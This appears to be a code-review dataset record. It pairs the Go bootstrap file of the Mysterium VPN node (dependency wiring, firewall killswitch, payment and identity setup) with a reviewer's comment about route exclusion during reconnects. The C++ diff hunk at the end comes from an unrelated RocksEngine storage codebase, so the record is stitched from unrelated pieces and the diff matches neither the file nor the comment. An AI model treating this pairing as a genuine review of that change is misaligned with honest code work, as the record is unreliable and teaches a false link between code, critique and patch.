"github.com/mysteriumnetwork/node/core/storage/boltdb/migrations/history" "github.com/mysteriumnetwork/node/core/storage/boltdb/migrator" "github.com/mysteriumnetwork/node/eventbus" "github.com/mysteriumnetwork/node/feedback" "github.com/mysteriumnetwork/node/firewall" "github.com/mysteriumnetwork/node/identity" "github.com/mysteriumnetwork/node/identity/registry" identity_registry "github.com/mysteriumnetwork/node/identity/registry" identity_selector "github.com/mysteriumnetwork/node/identity/selector" "github.com/mysteriumnetwork/node/logconfig" "github.com/mysteriumnetwork/node/market/mysterium" "github.com/mysteriumnetwork/node/metadata" "github.com/mysteriumnetwork/node/mmn" "github.com/mysteriumnetwork/node/nat" natprobe "github.com/mysteriumnetwork/node/nat/behavior" "github.com/mysteriumnetwork/node/nat/event" "github.com/mysteriumnetwork/node/nat/mapping" "github.com/mysteriumnetwork/node/nat/upnp" "github.com/mysteriumnetwork/node/p2p" "github.com/mysteriumnetwork/node/pilvytis" "github.com/mysteriumnetwork/node/requests" "github.com/mysteriumnetwork/node/router" service_noop "github.com/mysteriumnetwork/node/services/noop" service_openvpn "github.com/mysteriumnetwork/node/services/openvpn" "github.com/mysteriumnetwork/node/session/connectivity" "github.com/mysteriumnetwork/node/session/pingpong" "github.com/mysteriumnetwork/node/sleep" "github.com/mysteriumnetwork/node/tequilapi" "github.com/mysteriumnetwork/node/utils/netutil" 
"github.com/mysteriumnetwork/payments/client" paymentClient "github.com/mysteriumnetwork/payments/client" psort "github.com/mysteriumnetwork/payments/client/sort" ) // UIServer represents our web server type UIServer interface { Serve() Stop() } // Dependencies is DI container for top level components which is reused in several places type Dependencies struct { Node *Node HTTPTransport *http.Transport HTTPClient *requests.HTTPClient NetworkDefinition metadata.NetworkDefinition MysteriumAPI *mysterium.MysteriumAPI PricingHelper *pingpong.Pricer EtherClientL1 *paymentClient.EthMultiClient EtherClientL2 *paymentClient.EthMultiClient SorterClientL1 *psort.MultiClientSorter SorterClientL2 *psort.MultiClientSorter EtherClients []*paymentClient.ReconnectableEthClient BrokerConnector *nats.BrokerConnector BrokerConnection nats.Connection NATService nat.NATService NATProber natprobe.NATProber Storage *boltdb.Bolt Keystore *identity.Keystore IdentityManager identity.Manager SignerFactory identity.SignerFactory IdentityRegistry identity_registry.IdentityRegistry IdentitySelector identity_selector.Handler IdentityMover *identity.Mover DiscoveryFactory service.DiscoveryFactory ProposalRepository *discovery.PricedServiceProposalRepository FilterPresetStorage *proposal.FilterPresetStorage DiscoveryWorker discovery.Worker QualityClient *quality.MysteriumMORQA IPResolver ip.Resolver LocationResolver *location.Cache PolicyOracle *policy.Oracle SessionStorage *consumer_session.Storage SessionConnectivityStatusStorage connectivity.StatusStorage EventBus eventbus.EventBus ConnectionManager connection.Manager ConnectionRegistry *connection.Registry ServicesManager *service.Manager ServiceRegistry *service.Registry ServiceSessions *service.SessionPool ServiceFirewall firewall.IncomingTrafficFirewall PortPool *port.Pool PortMapper mapping.PortMapper StateKeeper *state.Keeper P2PDialer p2p.Dialer P2PListener p2p.Listener Authenticator *auth.Authenticator JWTAuthenticator *auth.JWTAuthenticator UIServer UIServer Transactor *registry.Transactor BCHelper *paymentClient.MultichainBlockchainClient ProviderRegistrar *registry.ProviderRegistrar LogCollector *logconfig.Collector Reporter *feedback.Reporter BeneficiarySaver beneficiary.Saver BeneficiaryProvider beneficiary.Provider ProviderInvoiceStorage *pingpong.ProviderInvoiceStorage ConsumerTotalsStorage *pingpong.ConsumerTotalsStorage HermesPromiseStorage *pingpong.HermesPromiseStorage ConsumerBalanceTracker *pingpong.ConsumerBalanceTracker HermesChannelRepository *pingpong.HermesChannelRepository HermesPromiseSettler pingpong.HermesPromiseSettler HermesURLGetter *pingpong.HermesURLGetter HermesCaller *pingpong.HermesCaller HermesPromiseHandler *pingpong.HermesPromiseHandler SettlementHistoryStorage *pingpong.SettlementHistoryStorage AddressProvider *pingpong.AddressProvider HermesStatusChecker *pingpong.HermesStatusChecker MMN *mmn.MMN PilvytisAPI *pilvytis.API Pilvytis *pilvytis.Service ResidentCountry *identity.ResidentCountry PayoutAddressStorage *payout.AddressStorage NATStatusV2Keeper *nat.StatusTrackerV2 } // Bootstrap initiates all container dependencies func (di *Dependencies) Bootstrap(nodeOptions node.Options) error { logconfig.Configure(&nodeOptions.LogOptions) netutil.LogNetworkStats() p2p.RegisterContactUnserializer() log.Info().Msg("Starting Mysterium Node " + metadata.VersionAsString()) // Check early for presence of an already running node tequilaListener, err := di.createTequilaListener(nodeOptions) if err != nil { return err } if err := 
nodeOptions.Directories.Check(); err != nil { return err } if err := di.bootstrapFirewall(nodeOptions.Firewall); err != nil { return err } di.bootstrapEventBus() di.bootstrapAddressProvider(nodeOptions) if err := di.bootstrapStorage(nodeOptions.Directories.Storage); err != nil { return err } netutil.ClearStaleRoutes() if err := di.bootstrapNetworkComponents(nodeOptions); err != nil { return err } if err := di.bootstrapLocationComponents(nodeOptions); err != nil { return err } if err := di.bootstrapResidentCountry(); err != nil { return err } if err := di.bootstrapIdentityComponents(nodeOptions); err != nil { return err } if err := di.bootstrapDiscoveryComponents(nodeOptions.Discovery); err != nil { return err } if err := di.bootstrapAuthenticator(); err != nil { return err } di.bootstrapUIServer(nodeOptions) if err := di.bootstrapMMN(); err != nil { return err } portRange, err := getUDPListenPorts() if err != nil { return err } di.PortPool = port.NewFixedRangePool(portRange) di.bootstrapP2P() di.SessionConnectivityStatusStorage = connectivity.NewStatusStorage() if err := di.bootstrapServices(nodeOptions); err != nil { return err } if err := di.bootstrapQualityComponents(nodeOptions.Quality); err != nil { return err } if err := di.bootstrapNodeComponents(nodeOptions, tequilaListener); err != nil { return err } di.registerConnections(nodeOptions) if err = di.handleConnStateChange(); err != nil { return err } if err := di.Node.Start(); err != nil { return err } appconfig.Current.EnableEventPublishing(di.EventBus) di.handleNATStatusForPublicIP() log.Info().Msg("Mysterium node started!") return nil } func (di *Dependencies) bootstrapAddressProvider(nodeOptions node.Options) { ch1 := nodeOptions.Chains.Chain1 ch2 := nodeOptions.Chains.Chain2 addresses := map[int64]client.SmartContractAddresses{ ch1.ChainID: { Registry: common.HexToAddress(ch1.RegistryAddress), Myst: common.HexToAddress(ch1.MystAddress), Hermes: common.HexToAddress(ch1.HermesID), ChannelImplementation: common.HexToAddress(ch1.ChannelImplAddress), }, ch2.ChainID: { Registry: common.HexToAddress(ch2.RegistryAddress), Myst: common.HexToAddress(ch2.MystAddress), Hermes: common.HexToAddress(ch2.HermesID), ChannelImplementation: common.HexToAddress(ch2.ChannelImplAddress), }, } keeper := client.NewMultiChainAddressKeeper(addresses) di.AddressProvider = pingpong.NewAddressProvider(keeper, common.HexToAddress(nodeOptions.Transactor.Identity)) } func (di *Dependencies) bootstrapP2P() { verifierFactory := func(id identity.Identity) identity.Verifier { return identity.NewVerifierIdentity(id) } di.P2PListener = p2p.NewListener(di.BrokerConnection, di.SignerFactory, identity.NewVerifierSigned(), di.IPResolver, di.EventBus) di.P2PDialer = p2p.NewDialer(di.BrokerConnector, di.SignerFactory, verifierFactory, di.IPResolver, di.PortPool, di.EventBus) } func (di *Dependencies) createTequilaListener(nodeOptions node.Options) (net.Listener, error) { if !nodeOptions.TequilapiEnabled { return tequilapi.NewNoopListener() } tequilaListener, err := net.Listen("tcp", fmt.Sprintf("%s:%d", nodeOptions.TequilapiAddress, nodeOptions.TequilapiPort)) if err != nil { return nil, errors.Wrap(err, fmt.Sprintf("the port %v seems to be taken. 
Either you're already running a node or it is already used by another application", nodeOptions.TequilapiPort)) } return tequilaListener, nil } func (di *Dependencies) bootstrapStateKeeper(options node.Options) error { deps := state.KeeperDeps{ NATStatusProvider: nat.NewStatusTracker("unknown"), Publisher: di.EventBus, ServiceLister: di.ServicesManager, IdentityProvider: di.IdentityManager, IdentityRegistry: di.IdentityRegistry, IdentityChannelCalculator: di.AddressProvider, BalanceProvider: di.ConsumerBalanceTracker, EarningsProvider: di.HermesChannelRepository, ChainID: options.ChainID, ProposalPricer: di.ProposalRepository, } di.StateKeeper = state.NewKeeper(deps, state.DefaultDebounceDuration) return di.StateKeeper.Subscribe(di.EventBus) } func (di *Dependencies) registerOpenvpnConnection(nodeOptions node.Options) { service_openvpn.Bootstrap() connectionFactory := func() (connection.Connection, error) { return service_openvpn.NewClient( // TODO instead of passing binary path here, Openvpn from node options could represent abstract vpn factory itself nodeOptions.Openvpn.BinaryPath(), nodeOptions.Directories.Script, nodeOptions.Directories.Runtime, di.SignerFactory, di.IPResolver, ) } di.ConnectionRegistry.Register(service_openvpn.ServiceType, connectionFactory) } func (di *Dependencies) registerNoopConnection() { service_noop.Bootstrap() di.ConnectionRegistry.Register(service_noop.ServiceType, service_noop.NewConnection) } // Shutdown stops container func (di *Dependencies) Shutdown() (err error) { var errs []error defer func() { for i := range errs { log.Error().Err(errs[i]).Msg("Dependencies shutdown failed") if err == nil { err = errs[i] } } }() // Kill node first which includes current active VPN connection cleanup. if di.Node != nil { if err := di.Node.Kill(); err != nil { errs = append(errs, err) } } if di.ServicesManager != nil { if err := di.ServicesManager.Kill(); err != nil { errs = append(errs, err) } } if di.PolicyOracle != nil { di.PolicyOracle.Stop() } if di.NATService != nil { if err := di.NATService.Disable(); err != nil { errs = append(errs, err) } } if di.EtherClientL1 != nil { di.EtherClientL1.Close() } if di.SorterClientL1 != nil { di.SorterClientL1.Stop() } if di.EtherClientL2 != nil { di.EtherClientL2.Close() } if di.SorterClientL2 != nil { di.SorterClientL2.Stop() } if di.DiscoveryWorker != nil { di.DiscoveryWorker.Stop() } if di.Pilvytis != nil { di.Pilvytis.Stop() } if di.BrokerConnection != nil { di.BrokerConnection.Close() } if di.QualityClient != nil { di.QualityClient.Stop() } if di.ServiceFirewall != nil { di.ServiceFirewall.Teardown() } firewall.Reset() if di.Storage != nil { if err := di.Storage.Close(); err != nil { errs = append(errs, err) } } return nil } func (di *Dependencies) bootstrapStorage(path string) error { localStorage, err := boltdb.NewStorage(path) if err != nil { return err } migrator := migrator.NewMigrator(localStorage) err = migrator.RunMigrations(history.Sequence) if err != nil { return err } di.Storage = localStorage if !config.GetBool(config.FlagUserMode) { netutil.SetRouteManagerStorage(di.Storage) } invoiceStorage := pingpong.NewInvoiceStorage(di.Storage) di.ProviderInvoiceStorage = pingpong.NewProviderInvoiceStorage(invoiceStorage) di.ConsumerTotalsStorage = pingpong.NewConsumerTotalsStorage(di.Storage, di.EventBus) di.HermesPromiseStorage = pingpong.NewHermesPromiseStorage(di.Storage) di.SessionStorage = consumer_session.NewSessionStorage(di.Storage) di.SettlementHistoryStorage = pingpong.NewSettlementHistoryStorage(di.Storage) 
return di.SessionStorage.Subscribe(di.EventBus) } func (di *Dependencies) getHermesURL(nodeOptions node.Options) (string, error) { log.Info().Msgf("node chain id %v", nodeOptions.ChainID) if nodeOptions.ChainID == nodeOptions.Chains.Chain1.ChainID { return di.HermesURLGetter.GetHermesURL(nodeOptions.ChainID, common.HexToAddress(nodeOptions.Chains.Chain1.HermesID)) } return di.HermesURLGetter.GetHermesURL(nodeOptions.ChainID, common.HexToAddress(nodeOptions.Chains.Chain2.HermesID)) } func (di *Dependencies) bootstrapNodeComponents(nodeOptions node.Options, tequilaListener net.Listener) error { // Consumer current session bandwidth bandwidthTracker := bandwidth.NewTracker(di.EventBus) if err := bandwidthTracker.Subscribe(di.EventBus); err != nil { return err } di.bootstrapBeneficiarySaver(nodeOptions) di.bootstrapBeneficiaryProvider(nodeOptions) di.PayoutAddressStorage = payout.NewAddressStorage(di.Storage, di.MMN) if err := di.bootstrapProviderRegistrar(nodeOptions); err != nil { return err } di.ConsumerBalanceTracker = pingpong.NewConsumerBalanceTracker( di.EventBus, di.BCHelper, di.ConsumerTotalsStorage, di.HermesCaller, di.Transactor, di.IdentityRegistry, di.AddressProvider, pingpong.ConsumerBalanceTrackerConfig{ FastSync: pingpong.PollConfig{ Interval: nodeOptions.Payments.BalanceFastPollInterval, Timeout: nodeOptions.Payments.BalanceFastPollTimeout, }, LongSync: pingpong.PollConfig{ Interval: nodeOptions.Payments.BalanceLongPollInterval, }, }, ) err := di.ConsumerBalanceTracker.Subscribe(di.EventBus) if err != nil { return errors.Wrap(err, "could not subscribe consumer balance tracker to relevant events") } di.HermesPromiseHandler = pingpong.NewHermesPromiseHandler(pingpong.HermesPromiseHandlerDeps{ HermesPromiseStorage: di.HermesPromiseStorage, HermesCallerFactory: func(hermesURL string) pingpong.HermesHTTPRequester { return pingpong.NewHermesCaller(di.HTTPClient, hermesURL) }, HermesURLGetter: di.HermesURLGetter, FeeProvider: di.Transactor, Encryption: di.Keystore, EventBus: di.EventBus, }) if err := di.HermesPromiseHandler.Subscribe(di.EventBus); err != nil { return err } if err := di.bootstrapHermesPromiseSettler(nodeOptions); err != nil { return err } di.ConnectionRegistry = connection.NewRegistry() di.ConnectionManager = connection.NewManager( pingpong.ExchangeFactoryFunc( di.Keystore, di.SignerFactory, di.ConsumerTotalsStorage, di.AddressProvider, di.EventBus, nodeOptions.Payments.ConsumerDataLeewayMegabytes, ), di.ConnectionRegistry.CreateConnection, di.EventBus, di.IPResolver, di.LocationResolver, connection.DefaultConfig(), connection.DefaultStatsReportInterval, connection.NewValidator( di.ConsumerBalanceTracker, di.IdentityManager, ), di.P2PDialer, ) di.NATProber = natprobe.NewNATProber(di.ConnectionManager, di.EventBus) di.LogCollector = logconfig.NewCollector(&logconfig.CurrentLogOptions) reporter, err := feedback.NewReporter(di.LogCollector, di.IdentityManager, nodeOptions.FeedbackURL) if err != nil { return err } di.Reporter = reporter if err := di.bootstrapStateKeeper(nodeOptions); err != nil { return err } di.bootstrapPilvytis(nodeOptions) tequilapiHTTPServer, err := di.bootstrapTequilapi(nodeOptions, tequilaListener) if err != nil { return err } sleepNotifier := sleep.NewNotifier(di.ConnectionManager, di.EventBus) sleepNotifier.Subscribe() di.Node = NewNode(di.ConnectionManager, tequilapiHTTPServer, di.EventBus, di.UIServer, sleepNotifier) sessionProviderFunc := func(providerID string) (results []nat.Session) { for _, session := range 
di.QualityClient.ProviderSessions(providerID) { results = append(results, nat.Session{ProviderID: session.ProposalID.ProviderID, MonitoringFailed: session.MonitoringFailed, ServiceType: session.ProposalID.ServiceType}) } return results } di.NATStatusV2Keeper = nat.NewStatusTrackerV2( sessionProviderFunc, di.IdentityManager, di.EventBus, nodeOptions.NATStatusTrackerV2, ) return nil } // function decides on network definition combined from testnet3/localnet flags and possible overrides func (di *Dependencies) bootstrapNetworkComponents(options node.Options) (err error) { optionsNetwork := options.OptionsNetwork network := metadata.DefaultNetwork switch { case optionsNetwork.Testnet3: network = metadata.Testnet3Definition case optionsNetwork.Localnet: network = metadata.LocalnetDefinition } // override defined values one by one from options if optionsNetwork.MysteriumAPIAddress != metadata.DefaultNetwork.MysteriumAPIAddress { network.MysteriumAPIAddress = optionsNetwork.MysteriumAPIAddress } if !reflect.DeepEqual(optionsNetwork.BrokerAddresses, metadata.DefaultNetwork.BrokerAddresses) { network.BrokerAddresses = optionsNetwork.BrokerAddresses } if fmt.Sprint(optionsNetwork.EtherClientRPCL1) != fmt.Sprint(metadata.DefaultNetwork.Chain1.EtherClientRPC) { network.Chain1.EtherClientRPC = optionsNetwork.EtherClientRPCL1 } if fmt.Sprint(optionsNetwork.EtherClientRPCL2) != fmt.Sprint(metadata.DefaultNetwork.Chain2.EtherClientRPC) { network.Chain2.EtherClientRPC = optionsNetwork.EtherClientRPCL2 } di.NetworkDefinition = network dnsMap := optionsNetwork.DNSMap for host, hostIPs := range network.DNSMap { dnsMap[host] = append(dnsMap[host], hostIPs...) } for host, hostIPs := range dnsMap { log.Info().Msgf("Using local DNS: %s -> %s", host, hostIPs) } resolver := requests.NewResolverMap(dnsMap) dialer := requests.NewDialerSwarm(options.BindAddress, options.SwarmDialerDNSHeadstart) dialer.ResolveContext = resolver di.HTTPTransport = requests.NewTransport(dialer.DialContext) di.HTTPClient = requests.NewHTTPClientWithTransport(di.HTTPTransport, requests.DefaultTimeout) di.MysteriumAPI = mysterium.NewClient(di.HTTPClient, network.MysteriumAPIAddress) di.PricingHelper = pingpong.NewPricer(di.MysteriumAPI) err = di.PricingHelper.Subscribe(di.EventBus) if err != nil { return err } brokerURLs := make([]*url.URL, len(di.NetworkDefinition.BrokerAddresses)) for i, brokerAddress := range di.NetworkDefinition.BrokerAddresses { brokerURL, err := nats.ParseServerURL(brokerAddress) if err != nil { return err } brokerURLs[i] = brokerURL } di.BrokerConnector = nats.NewBrokerConnector(dialer.DialContext, resolver) if di.BrokerConnection, err = di.BrokerConnector.Connect(brokerURLs...); err != nil { return err } log.Info().Msgf("Using L1 Eth endpoints: %v", network.Chain1.EtherClientRPC) log.Info().Msgf("Using L2 Eth endpoints: %v", network.Chain2.EtherClientRPC) di.EtherClients = make([]*paymentClient.ReconnectableEthClient, 0) bcClientsL1 := make([]paymentClient.AddressableEthClientGetter, 0) for _, rpc := range network.Chain1.EtherClientRPC { client, err := paymentClient.NewReconnectableEthClient(rpc, time.Second*30) if err != nil { log.Warn().Msgf("failed to load rpc endpoint: %s", rpc) continue } di.EtherClients = append(di.EtherClients, client) bcClientsL1 = append(bcClientsL1, client) } if len(bcClientsL1) == 0 { return errors.New("no l1 rpc endpoints loaded, can't continue") } bcClientsL2 := make([]paymentClient.AddressableEthClientGetter, 0) for _, rpc := range network.Chain2.EtherClientRPC { client, err := 
paymentClient.NewReconnectableEthClient(rpc, time.Second*30) if err != nil { log.Warn().Msgf("failed to load rpc endpoint: %s", rpc) continue } di.EtherClients = append(di.EtherClients, client) bcClientsL2 = append(bcClientsL2, client) } if len(bcClientsL2) == 0 { return errors.New("no l2 rpc endpoints loaded, can't continue") } notifyChannelL1 := make(chan paymentClient.Notification, 5) di.EtherClientL1, err = paymentClient.NewEthMultiClientNotifyDown(time.Second*20, bcClientsL1, notifyChannelL1) if err != nil { return err } di.SorterClientL1 = psort.NewMultiClientSorterNoTicker(di.EtherClientL1, notifyChannelL1) di.SorterClientL1.AddOnNotificationAction(psort.DefaultByAvailability) go di.SorterClientL1.Run() notifyChannelL2 := make(chan paymentClient.Notification, 5) di.EtherClientL2, err = paymentClient.NewEthMultiClientNotifyDown(time.Second*20, bcClientsL2, notifyChannelL2) if err != nil { return err } di.SorterClientL2 = psort.NewMultiClientSorterNoTicker(di.EtherClientL2, notifyChannelL2) di.SorterClientL2.AddOnNotificationAction(psort.DefaultByAvailability) go di.SorterClientL2.Run() bcL1 := paymentClient.NewBlockchain(di.EtherClientL1, options.Payments.BCTimeout) bcL2 := paymentClient.NewBlockchain(di.EtherClientL2, options.Payments.BCTimeout) clients := make(map[int64]paymentClient.BC) clients[options.Chains.Chain1.ChainID] = bcL1 clients[options.Chains.Chain2.ChainID] = bcL2 di.BCHelper = paymentClient.NewMultichainBlockchainClient(clients) di.HermesURLGetter = pingpong.NewHermesURLGetter(di.BCHelper, di.AddressProvider) registryStorage := registry.NewRegistrationStatusStorage(di.Storage) hermesURL, err := di.getHermesURL(options) if err != nil { return err } di.HermesCaller = pingpong.NewHermesCaller(di.HTTPClient, hermesURL) di.SignerFactory = func(id identity.Identity) identity.Signer { return identity.NewSigner(di.Keystore, id) } di.Transactor = registry.NewTransactor( di.HTTPClient, options.Transactor.TransactorEndpointAddress, di.AddressProvider, di.SignerFactory, di.EventBus, di.BCHelper, ) registryCfg := registry.IdentityRegistryConfig{ TransactorPollInterval: options.Payments.RegistryTransactorPollInterval, TransactorPollTimeout: options.Payments.RegistryTransactorPollTimeout, } if di.IdentityRegistry, err = identity_registry.NewIdentityRegistryContract(di.EtherClientL2, di.AddressProvider, registryStorage, di.EventBus, di.HermesCaller, di.Transactor, registryCfg); err != nil { return err } allow := []string{ network.MysteriumAPIAddress, options.Transactor.TransactorEndpointAddress, hermesURL, options.PilvytisAddress, } allow = append(allow, network.Chain1.EtherClientRPC...) allow = append(allow, network.Chain2.EtherClientRPC...) 
if err := di.AllowURLAccess(allow...); err != nil { return err } return di.IdentityRegistry.Subscribe(di.EventBus) } func (di *Dependencies) bootstrapEventBus() { di.EventBus = eventbus.New() } func (di *Dependencies) bootstrapIdentityComponents(options node.Options) error { var ks *keystore.KeyStore if options.Keystore.UseLightweight { log.Debug().Msg("Using lightweight keystore") ks = keystore.NewKeyStore(options.Directories.Keystore, keystore.LightScryptN, keystore.LightScryptP) } else { log.Debug().Msg("Using heavyweight keystore") ks = keystore.NewKeyStore(options.Directories.Keystore, keystore.StandardScryptN, keystore.StandardScryptP) } di.Keystore = identity.NewKeystoreFilesystem(options.Directories.Keystore, ks) if di.ResidentCountry == nil { return errMissingDependency("di.residentCountry") } di.IdentityManager = identity.NewIdentityManager(di.Keystore, di.EventBus, di.ResidentCountry) di.IdentitySelector = identity_selector.NewHandler( di.IdentityManager, identity.NewIdentityCache(options.Directories.Keystore, "remember.json"), di.SignerFactory, ) di.IdentityMover = identity.NewMover( di.Keystore, di.EventBus, di.SignerFactory) return nil } func (di *Dependencies) bootstrapQualityComponents(options node.OptionsQuality) (err error) { if err := di.AllowURLAccess(options.Address); err != nil { return err } di.QualityClient = quality.NewMorqaClient( requests.NewHTTPClientWithTransport(di.HTTPTransport, 10*time.Second), options.Address, di.SignerFactory, ) go di.QualityClient.Start() var transport quality.Transport switch options.Type { case node.QualityTypeElastic: transport = quality.NewElasticSearchTransport(di.HTTPClient, options.Address, 10*time.Second) case node.QualityTypeMORQA: transport = quality.NewMORQATransport(di.QualityClient, di.LocationResolver) case node.QualityTypeNone: transport = quality.NewNoopTransport() default: err = errors.Errorf("unknown Quality Oracle provider: %s", options.Type) } if err != nil { return err } // Quality metrics qualitySender := quality.NewSender(transport, metadata.VersionAsString()) if err := qualitySender.Subscribe(di.EventBus); err != nil { return err } // warm up the loader as the load takes up to a couple of secs loader := &upnp.GatewayLoader{} go loader.Get() natSender := event.NewSender(qualitySender, di.IPResolver.GetPublicIP, loader.HumanReadable) if err := natSender.Subscribe(di.EventBus); err != nil { return err } return nil } func (di *Dependencies) bootstrapLocationComponents(options node.Options) (err error) { if err = di.AllowURLAccess(options.Location.IPDetectorURL); err != nil { return errors.Wrap(err, "failed to add firewall exception") } ipResolver := ip.NewResolver(di.HTTPClient, options.BindAddress, options.Location.IPDetectorURL, ip.IPFallbackAddresses) di.IPResolver = ip.NewCachedResolver(ipResolver, 5*time.Minute) var resolver location.Resolver switch options.Location.Type { case node.LocationTypeManual: resolver = location.NewStaticResolver(options.Location.Country, options.Location.City, options.Location.IPType, di.IPResolver) case node.LocationTypeBuiltin: resolver, err = location.NewBuiltInResolver(di.IPResolver) case node.LocationTypeMMDB: resolver, err = location.NewExternalDBResolver(filepath.Join(options.Directories.Script, options.Location.Address), di.IPResolver) case node.LocationTypeOracle: if err := di.AllowURLAccess(options.Location.Address); err != nil { return err } resolver, err = location.NewOracleResolver(di.HTTPClient, options.Location.Address), nil default: err = errors.Errorf("unknown location 
provider: %s", options.Location.Type) } if err != nil { return err } di.LocationResolver = location.NewCache(resolver, di.EventBus, time.Minute*5) err = di.EventBus.SubscribeAsync(connectionstate.AppTopicConnectionState, di.LocationResolver.HandleConnectionEvent) if err != nil { return err } err = di.EventBus.SubscribeAsync(nodevent.AppTopicNode, di.LocationResolver.HandleNodeEvent) if err != nil { return err } return nil } func (di *Dependencies) bootstrapAuthenticator() error { key, err := auth.NewJWTEncryptionKey(di.Storage) if err != nil { return err } di.Authenticator = auth.NewAuthenticator() di.JWTAuthenticator = auth.NewJWTAuthenticator(key) return nil } func (di *Dependencies) bootstrapPilvytis(options node.Options) { di.PilvytisAPI = pilvytis.NewAPI(di.HTTPClient, options.PilvytisAddress, di.SignerFactory, di.LocationResolver, di.AddressProvider) statusTracker := pilvytis.NewStatusTracker(di.PilvytisAPI, di.IdentityManager, di.EventBus, 30*time.Second) di.Pilvytis = pilvytis.NewService(di.PilvytisAPI, di.IdentityManager, statusTracker) di.Pilvytis.Start() } func (di *Dependencies) bootstrapFirewall(options node.OptionsFirewall) error { firewall.DefaultOutgoingFirewall = firewall.NewOutgoingTrafficFirewall(config.GetBool(config.FlagOutgoingFirewall)) if err := firewall.DefaultOutgoingFirewall.Setup(); err != nil { return err } di.ServiceFirewall = firewall.NewIncomingTrafficFirewall(config.GetBool(config.FlagIncomingFirewall)) if err := di.ServiceFirewall.Setup(); err != nil { return err } if options.BlockAlways { bindAddress := "0.0.0.0" resolver := ip.NewResolver(di.HTTPClient, bindAddress, "", ip.IPFallbackAddresses) outboundIP, err := resolver.GetOutboundIP() if err != nil { return err } _, err = firewall.BlockNonTunnelTraffic(firewall.Global, outboundIP) return err } return nil } func (di *Dependencies) bootstrapBeneficiaryProvider(options node.Options) { di.BeneficiaryProvider = beneficiary.NewProvider( options.ChainID, di.AddressProvider, di.Storage, di.BCHelper, ) } func (di *Dependencies) bootstrapBeneficiarySaver(options node.Options) { di.BeneficiarySaver = beneficiary.NewSaver( options.ChainID, di.AddressProvider, di.Storage, di.BCHelper, di.HermesPromiseSettler, ) } func (di *Dependencies) handleConnStateChange() error { if di.HTTPClient == nil { return errors.New("HTTPClient is not initialized") } latestState := connectionstate.NotConnected return di.EventBus.SubscribeAsync(connectionstate.AppTopicConnectionState, func(e connectionstate.AppEventConnectionState) { // Here we care only about connected and disconnected events. if e.State != connectionstate.Connected && e.State != connectionstate.NotConnected { return } isDisconnected := latestState == connectionstate.Connected && e.State == connectionstate.NotConnected isConnected := latestState == connectionstate.NotConnected && e.State == connectionstate.Connected if isDisconnected || isConnected { netutil.LogNetworkStats() log.Info().Msg("Reconnecting HTTP clients due to VPN connection state change") di.HTTPTransport.CloseIdleConnections() for _, cl := range di.EtherClients { if err := cl.Reconnect(time.Second * 15); err != nil { log.Warn().Err(err).Msg("Ethereum client failed to reconnect, will retry one more time") // Default golang DNS resolver does not allow to reload /etc/resolv.conf more than once per 5 seconds. // This could lead to the problem, when right after connect/disconnect new DNS config not applied instantly. // Doing a couple of retries here to make sure we reconnected Ethererum client correctly. 
// Default DNS timeout is 10 seconds. It's enough to try to reconnect only twice to cover 5 seconds lag for DNS config reload. // https://github.com/mysteriumnetwork/node/issues/2282 if err := cl.Reconnect(time.Second * 15); err != nil { log.Error().Err(err).Msg("Ethereum client failed to reconnect") } } } di.EventBus.Publish(registry.AppTopicEthereumClientReconnected, struct{}{}) } latestState = e.State }) } func (di *Dependencies) handleNATStatusForPublicIP() { outIP, err := di.IPResolver.GetOutboundIP() if err != nil { log.Error().Err(err).Msg("Failed to get outbound IP address") } pubIP, err := di.IPResolver.GetPublicIP() if err != nil { log.Error().Err(err).Msg("Failed to get public IP address") } if outIP == pubIP && pubIP != "" { di.EventBus.Publish(event.AppTopicTraversal, event.BuildSuccessfulEvent("", "public_ip")) } } func (di *Dependencies) bootstrapResidentCountry() error { if di.EventBus == nil { return errMissingDependency("di.EventBus") } if di.LocationResolver == nil { return errMissingDependency("di.LocationResolver") } di.ResidentCountry = identity.NewResidentCountry(di.EventBus, di.LocationResolver) return nil } func errMissingDependency(dep string) error { return errors.New("Missing dependency: " + dep) } // AllowURLAccess allows the requested addresses to be served when the tunnel is active. func (di *Dependencies) AllowURLAccess(servers ...string) error { if _, err := firewall.AllowURLAccess(servers...); err != nil { return err } if _, err := di.ServiceFirewall.AllowURLAccess(servers...); err != nil { return err } if config.GetBool(config.FlagKeepConnectedOnFail) { if err := router.AllowURLAccess(servers...); err != nil { return err } } return nil } func getUDPListenPorts() (port.Range, error) { udpPortRange, err := port.ParseRange(config.GetString(config.FlagUDPListenPorts)) if err != nil { log.Warn().Err(err).Msg("Failed to parse UDP listen port range, using default value") return port.Range{}, fmt.Errorf("failed to parse UDP ports: %w", err) } return udpPortRange, nil }
1
17,257
This route exclusion is needed only for reconnecting, when one connection is lost and we are trying to establish another. I was thinking of adding two separate flags to enable the killswitch and the reconnect behaviour independently. That way we can keep the killswitch working without needing these routes excluded.
mysteriumnetwork-node
go
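The review comment above proposes splitting the single route-exclusion behaviour into two independent switches, one for the killswitch and one for reconnect handling. The sketch below only illustrates that idea and is not code from the repository; the struct, the flag names, and the excludeRoutes helper are hypothetical stand-ins for whatever the node's config package would actually expose.

```go
package main

import "fmt"

// Hypothetical, independent switches for the two behaviours discussed in the
// review comment: keeping the killswitch active does not force the reconnect
// route exclusion, and vice versa.
type routingFlags struct {
	KillswitchEnabled      bool // block non-tunnel traffic when the VPN drops
	ExcludeReconnectRoutes bool // exclude provider routes only while re-establishing a session
}

// excludeRoutes decides whether provider routes should be excluded for a
// reconnect attempt. This is a sketch: the real node would wire this through
// its config package and router, not through a plain struct.
func excludeRoutes(f routingFlags, reconnecting bool) bool {
	return f.ExcludeReconnectRoutes && reconnecting
}

func main() {
	f := routingFlags{KillswitchEnabled: true, ExcludeReconnectRoutes: false}
	// Killswitch stays on, but no routes are excluded during reconnect.
	fmt.Println("exclude routes during reconnect:", excludeRoutes(f, true))
}
```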
@@ -124,8 +124,8 @@ RocksEngine::RocksEngine(GraphSpaceID spaceId,
   }
   CHECK(status.ok()) << status.ToString();
   db_.reset(db);
-  partsNum_ = allParts().size();
   extractorLen_ = sizeof(PartitionID) + vIdLen;
+  partsNum_ = allParts().size();
   LOG(INFO) << "open rocksdb on " << path;
   backup();
1
